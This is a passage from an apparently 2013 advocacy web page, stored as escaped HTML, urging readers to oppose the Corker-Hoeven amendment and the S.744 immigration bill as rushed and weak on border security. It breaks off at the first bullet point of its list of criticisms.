Tell them to vote NO on the Corker-Hoeven amendment and S.744!\u00a0<\/strong><\/p>\n<p>Written with <a href=\"http:\/\/www.nytimes.com\/2013\/06\/21\/us\/politics\/stealth-campaign-from-the-white-house-for-an-immigration-bill.html?ref=politics\">approval of the Gang of Eight<\/a>, they filed their 1,200 page re-write of the amnesty bill (S.744) late Friday afternoon, giving their fellow Senators only one weekend to sift through the bill and search for all the new provisions.\u00a0Senator Corker <a href=\"http:\/\/www.breitbart.com\/Big-Government\/2013\/06\/23\/Flashback-Gang-of-Eight-GOP-ers-Critical-of-Long-Unread-Rushed-Secretive-Health-Care-Bill\">justified the rush<\/a> by stating\u00a0his colleagues in the Senate had <a href=\"http:\/\/washingtonexaminer.com\/the-hoeven-corker-immigration-amendment-is-1190-pages-major-new-provisions-lawmakers-rushing-to-read-before-monday-vote\/article\/2532269\">75 hours over the weekend<\/a> \u00a0to read and analyze the new version.<\/p>\n<p>Senators Corker and Hoeven <a href=\"http:\/\/www.corker.senate.gov\/public\/index.cfm\/news?ContentRecord_id=9b091a42-f7e4-4751-a361-731db54d835d\">claim<\/a> their amendment will significantly improve the border security provisions in the bill. But don&#8217;t be fooled! The Corker-Hoeven amendment contains only<a href=\"http:\/\/www.breitbart.com\/Big-Government\/2013\/06\/22\/Corker-admits-his-own-amendment-does-not-improve-immigration-law-enforcement\"> illusory promises<\/a> of border security attached to other measures that actually <a href=\"http:\/\/blog.heritage.org\/2013\/06\/24\/morning-bell-10-problems-with-the-gang-of-eight-immigration-bill\/?roi=echo3-16058788041-13347261-614697247219f61d4f6ba23fbe595f55&amp;utm_source=Newsletter&amp;utm_medium=Email&amp;utm_campaign=Morning%2BBell\">make the bill worse<\/a>!<\/p>\n<p>&nbsp;<\/p>\n<p>Consider the reality of Corker-Hoeven:<\/p>\n<ul>\n<li>Purports to add 19,200 Border Patrol agents to the U.S.-Mexico border.
